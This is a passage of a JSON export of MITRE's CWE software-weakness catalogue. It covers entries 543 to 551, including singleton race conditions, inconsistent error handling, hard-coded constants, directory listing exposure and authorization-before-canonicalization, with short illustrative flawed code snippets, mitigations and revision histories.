Through Cleanup Log Files","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because its abstraction was too low-level.  See CWE-532.","Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Cleanup Log Files","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Cleanup Log Files","attr":{"@_Date":"2018-03-27"}}]}},"543":{"attr":{"@_ID":"543","@_Name":"Use of Singleton Pattern Without Synchronization in a Multithreaded Context","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses the singleton pattern when creating a resource within a multithreaded environment.","Extended_Description":"The use of a singleton pattern may not be thread-safe.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"820","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Other","Integrity"],"Impact":["Other","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use the Thread-Specific Storage Pattern. See References."},{"Phase":"Implementation","Description":"Do not use member fields to store information in the Servlet. In multithreading environments, storing user data in Servlet member fields introduces a data access race condition."},{"Phase":"Implementation","Description":"Avoid using the double-checked locking pattern in language versions that cannot guarantee thread safety. This pattern may be used to avoid the overhead of a synchronized call, but in certain versions of Java (for example), this has been shown to be unsafe because it still introduces a race condition (CWE-209).","Effectiveness":"Limited"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This method is part of a singleton pattern, yet the following singleton() pattern is not thread-safe. It is possible that the method will create two objects instead of only one.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private static NumberConverter singleton;public static NumberConverter get_singleton() {}","xhtml:br":"","xhtml:div":{"#text":"if (singleton == null) {}return singleton;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"singleton = new NumberConverter();","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}}},"Body_Text":["Consider the following course of events:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Thread A enters the method, finds singleton to be null, begins the NumberConverter constructor, and then is swapped out of execution."},{"xhtml:div":"Thread B enters the method and finds that singleton remains null. This will happen if A was swapped out during the middle of the constructor, because the object reference is not set to point at the new object on the heap until the object is fully initialized."},{"xhtml:div":"Thread B continues and constructs another NumberConverter object and returns it while exiting the method."},{"xhtml:div":"Thread A continues, finishes constructing its NumberConverter object, and returns its version."}]}},"At this point, the threads have created and returned two different objects."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC07-J","Entry_Name":"Prevent multiple instantiations of singleton objects"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-474"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Use of Singleton Pattern in a Non-thread-safe Manner","attr":{"@_Date":"2010-09-27"}}}},"544":{"attr":{"@_ID":"544","@_Name":"Missing Standardized Error Handling Mechanism","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not use a standardized method for handling errors throughout the code, which might introduce inconsistent error handling and resultant weaknesses.","Extended_Description":"If the application handles error messages individually, on a one-by-one basis, this is likely to result in inconsistent error handling. The causes of errors may be lost. Also, detailed information about the causes of an error may be unintentionally returned to the user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Quality Degradation","Unexpected State","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"define a strategy for handling errors of different severities, such as fatal errors versus basic log events. Use or create built-in language features, or an external package, that provides an easy-to-use API and define coding standards for the detection and handling of errors."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR00-C","Entry_Name":"Adopt and implement a consistent and comprehensive error-handling policy"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"}],"Previous_Entry_Name":[{"#text":"Missing Error Handling Mechanism","attr":{"@_Date":"2009-03-10"}},{"#text":"Failure to Use a Standardized Error Handling Mechanism","attr":{"@_Date":"2010-12-13"}}]}},"545":{"attr":{"@_ID":"545","@_Name":"DEPRECATED: Use of Dynamic Class Loading","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated because it partially overlaps CWE-470, it describes legitimate programmer behavior, and other portions will need to be integrated into other entries.","Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Dynamic Class Loading","attr":{"@_Date":"2008-04-11"}},{"#text":"Use of Dynamic Class Loading","attr":{"@_Date":"2017-05-03"}}]}},"546":{"attr":{"@_ID":"546","@_Name":"Suspicious Comment","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains comments that suggest the presence of bugs, incomplete functionality, or weaknesses.","Extended_Description":"Many suspicious comments, such as BUG, HACK, FIXME, LATER, LATER2, TODO, in the code indicate missing security functionality and checking. Others indicate code problems that programmers should fix, such as hard-coded variables, error handling, not using stored procedures, and performance issues.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation","Note":"Suspicious comments could be an indication that there are problems in the source code that may need to be fixed and is an indication of poor quality. This could lead to further bugs and the introduction of weaknesses."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Documentation","Description":"Remove comments that suggest the presence of bugs, incomplete functionality, or weaknesses, before deploying the application."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following excerpt demonstrates the use of a suspicious comment in an incomplete code block that may have security repercussions.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"if (user == null) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// TODO: Handle null user condition."}}}}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"547":{"attr":{"@_ID":"547","@_Name":"Use of Hard-coded, Security-relevant Constants","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program uses hard-coded constants instead of symbolic names for security-critical values, which increases the likelihood of mistakes during code maintenance or security policy change.","Extended_Description":"If the developer does not find all occurrences of the hard-coded constants, an incorrect policy decision may be made if one of the constants is not changed. Making changes to these values will require code changes that may be difficult or impossible once the system is released to the field. In addition, these hard-coded values may become available to attackers if the code is ever disclosed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Varies by Context","Quality Degradation"],"Note":"The existence of hardcoded constants could cause unexpected behavior and the introduction of weaknesses during code maintenance or when making changes to the code if all occurrences are not modified. The use of hardcoded constants is an indication of poor quality."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Avoid using hard-coded constants. Configuration files offer a more flexible solution."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The usage of symbolic names instead of hard-coded constants is preferred.","Body_Text":["The following is an example of using a hard-coded constant instead of a symbolic name.","If the buffer value needs to be changed, then it has to be altered in more than one place. If the developer forgets or does not find all occurences, in this example it could lead to a buffer overflow.","In this example the developer will only need to change one value and all references to the buffer size are updated, as a symbolic name is used instead of a hard-coded constant."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buffer[1024];...fgets(buffer, 1024, stdin);","xhtml:br":["",""]}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"enum { MAX_BUFFER_SIZE = 1024 };...char buffer[MAX_BUFFER_SIZE];...fgets(buffer, MAX_BUFFER_SIZE, stdin);","xhtml:br":["","","",""]}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"DCL06-C","Entry_Name":"Use meaningful symbolic constants to represent literal values in program logic"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Security-relevant Constants","attr":{"@_Date":"2008-04-11"}}}},"548":{"attr":{"@_ID":"548","@_Name":"Exposure of Information Through Directory Listing","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A directory listing is inappropriately exposed, yielding potentially sensitive information to attackers.","Extended_Description":"A directory listing provides an attacker with the complete index of all the resources located inside of the directory. The specific risks and consequences vary depending on which files are listed and accessible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"497","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"Exposing the contents of a directory can lead to an attacker gaining access to source code or providing useful information for the attacker to devise exploits, such as creation times of files or any information that may be encoded in file names. The directory listing may also compromise private or confidential data."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","System Configuration"],"Description":"Recommendations include restricting access to important directories or files by adopting a need to know requirement for both the document and server root, and turning off features such as Automatic Directory Listings that could expose private files and provide information that could be utilized by an attacker when formulating or conducting an attack."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":16,"Entry_Name":"Directory Indexing"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Directory Listing","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Directory Listing","attr":{"@_Date":"2020-02-24"}}]}},"549":{"attr":{"@_ID":"549","@_Name":"Missing Password Field Masking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not mask passwords during entry, increasing the potential for attackers to observe and capture passwords.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","Requirements"],"Description":"Recommendations include requiring all password fields in your web application be masked to prevent other users from seeing this information."}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Type"}]}},"550":{"attr":{"@_ID":"550","@_Name":"Server-generated Error Message Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Certain conditions, such as network failure, will cause a server error message to be displayed.","Extended_Description":"While error messages in and of themselves are not dangerous, per se, it is what an attacker can glean from them that might cause eventual problems.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"209","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","System Configuration"],"Description":"Recommendations include designing and adding consistent error handling mechanisms which are capable of handling any user input to your web application, providing meaningful detail to end-users, and preventing error messages that might provide information useful to an attacker from being displayed."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Server Error Message","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Server Error Message","attr":{"@_Date":"2020-02-24"}}]}},"551":{"attr":{"@_ID":"551","@_Name":"Incorrect Behavior Order: Authorization Before Parsing and Canonicalization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"If a web server does not fully parse requested URLs before it examines them for authorization, it may be possible for an attacker to bypass authorization protection.","Extended_Description":"For instance, the character strings /./ and / both mean current directory. If /SomeDirectory is a protected directory and an attacker requests /./SomeDirectory, the attacker may be able to gain access to the resource if /./ is not converted to / before the authorization check is 